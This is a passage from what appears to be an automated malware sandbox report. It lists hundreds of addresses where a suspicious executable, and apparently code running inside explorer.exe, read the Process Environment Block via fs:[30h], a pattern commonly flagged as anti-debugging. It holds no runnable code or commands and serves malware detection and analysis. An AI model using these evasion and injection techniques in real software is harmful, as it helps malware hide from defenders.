          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]6_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]6_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]6_2_016FFDE2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016E8DF1 mov eax, dword ptr fs:[00000030h]6_2_016E8DF1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov ecx, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]6_2_016B6DC9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016635A1 mov eax, dword ptr fs:[00000030h]6_2_016635A1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]6_2_01661DB5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]6_2_017005AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]6_2_017005AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]6_2_01632D8A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]6_2_0166FD9B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]6_2_0166FD9B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165746D mov eax, dword ptr fs:[00000030h]6_2_0165746D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A44B mov eax, dword ptr fs:[00000030h]6_2_0166A44B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]6_2_016CC450
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]6_2_016CC450
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166BC2C mov eax, dword ptr fs:[00000030h]6_2_0166BC2C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]6_2_016B6C0A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]6_2_016F1C06
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]6_2_0170740D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F14FB mov eax, dword ptr fs:[00000030h]6_2_016F14FB
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]6_2_016B6CF0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708CD6 mov eax, dword ptr fs:[00000030h]6_2_01708CD6
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164849B mov eax, dword ptr fs:[00000030h]6_2_0164849B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164FF60 mov eax, dword ptr fs:[00000030h]6_2_0164FF60
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708F6A mov eax, dword ptr fs:[00000030h]6_2_01708F6A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164EF40 mov eax, dword ptr fs:[00000030h]6_2_0164EF40
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]6_2_01634F2E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]6_2_01634F2E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166E730 mov eax, dword ptr fs:[00000030h]6_2_0166E730
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]6_2_0166A70E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]6_2_0166A70E
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165F716 mov eax, dword ptr fs:[00000030h]6_2_0165F716
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]6_2_016CFF10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]6_2_016CFF10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]6_2_0170070D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]6_2_0170070D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016737F5 mov eax, dword ptr fs:[00000030h]6_2_016737F5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01648794 mov eax, dword ptr fs:[00000030h]6_2_01648794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]6_2_016B7794
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164766D mov eax, dword ptr fs:[00000030h]6_2_0164766D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]6_2_0165AE73
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]6_2_01647E41
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]6_2_016FAE44
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]6_2_016FAE44
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163E620 mov eax, dword ptr fs:[00000030h]6_2_0163E620
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFE3F mov eax, dword ptr fs:[00000030h]6_2_016EFE3F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]6_2_0163C600
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01668E00 mov eax, dword ptr fs:[00000030h]6_2_01668E00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1608 mov eax, dword ptr fs:[00000030h]6_2_016F1608
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]6_2_0166A61C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]6_2_0166A61C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016616E0 mov ecx, dword ptr fs:[00000030h]6_2_016616E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016476E2 mov eax, dword ptr fs:[00000030h]6_2_016476E2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01678EC7 mov eax, dword ptr fs:[00000030h]6_2_01678EC7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708ED6 mov eax, dword ptr fs:[00000030h]6_2_01708ED6
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016636CC mov eax, dword ptr fs:[00000030h]6_2_016636CC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFEC0 mov eax, dword ptr fs:[00000030h]6_2_016EFEC0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B46A7 mov eax, dword ptr fs:[00000030h]6_2_016B46A7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]6_2_01700EA5
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFE87 mov eax, dword ptr fs:[00000030h]6_2_016CFE87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05050050 mov eax, dword ptr fs:[00000030h]11_2_05050050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]11_2_050CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]11_2_050CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101074 mov eax, dword ptr fs:[00000030h]11_2_05101074
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505746D mov eax, dword ptr fs:[00000030h]11_2_0505746D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F2073 mov eax, dword ptr fs:[00000030h]11_2_050F2073
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039080 mov eax, dword ptr fs:[00000030h]11_2_05039080
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]11_2_050B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]11_2_050B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504849B mov eax, dword ptr fs:[00000030h]11_2_0504849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050790AF mov eax, dword ptr fs:[00000030h]11_2_050790AF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov ecx, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]11_2_0506F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108CD6 mov eax, dword ptr fs:[00000030h]11_2_05108CD6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov ecx, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]11_2_050CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050358EC mov eax, dword ptr fs:[00000030h]11_2_050358EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F14FB mov eax, dword ptr fs:[00000030h]11_2_050F14FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]11_2_050B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]11_2_0506A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]11_2_0506A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505F716 mov eax, dword ptr fs:[00000030h]11_2_0505F716
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F131B mov eax, dword ptr fs:[00000030h]11_2_050F131B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]11_2_050CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]11_2_050CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]11_2_0510070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]11_2_0510070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]11_2_05034F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]11_2_05034F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506E730 mov eax, dword ptr fs:[00000030h]11_2_0506E730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB40 mov eax, dword ptr fs:[00000030h]11_2_0503DB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504EF40 mov eax, dword ptr fs:[00000030h]11_2_0504EF40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108B58 mov eax, dword ptr fs:[00000030h]11_2_05108B58
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503F358 mov eax, dword ptr fs:[00000030h]11_2_0503F358
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB60 mov ecx, dword ptr fs:[00000030h]11_2_0503DB60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504FF60 mov eax, dword ptr fs:[00000030h]11_2_0504FF60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108F6A mov eax, dword ptr fs:[00000030h]11_2_05108F6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]11_2_05063B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]11_2_05063B7A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F138A mov eax, dword ptr fs:[00000030h]11_2_050F138A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]11_2_05041B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]11_2_05041B8F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050ED380 mov ecx, dword ptr fs:[00000030h]11_2_050ED380
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048794 mov eax, dword ptr fs:[00000030h]11_2_05048794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062397 mov eax, dword ptr fs:[00000030h]11_2_05062397
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506B390 mov eax, dword ptr fs:[00000030h]11_2_0506B390
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05105BA5 mov eax, dword ptr fs:[00000030h]11_2_05105BA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]11_2_050B53CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]11_2_050B53CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505DBE9 mov eax, dword ptr fs:[00000030h]11_2_0505DBE9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050737F5 mov eax, dword ptr fs:[00000030h]11_2_050737F5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05068E00 mov eax, dword ptr fs:[00000030h]11_2_05068E00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1608 mov eax, dword ptr fs:[00000030h]11_2_050F1608
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048A0A mov eax, dword ptr fs:[00000030h]11_2_05048A0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov ecx, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]11_2_0503AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]11_2_0503AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05053A1C mov eax, dword ptr fs:[00000030h]11_2_05053A1C
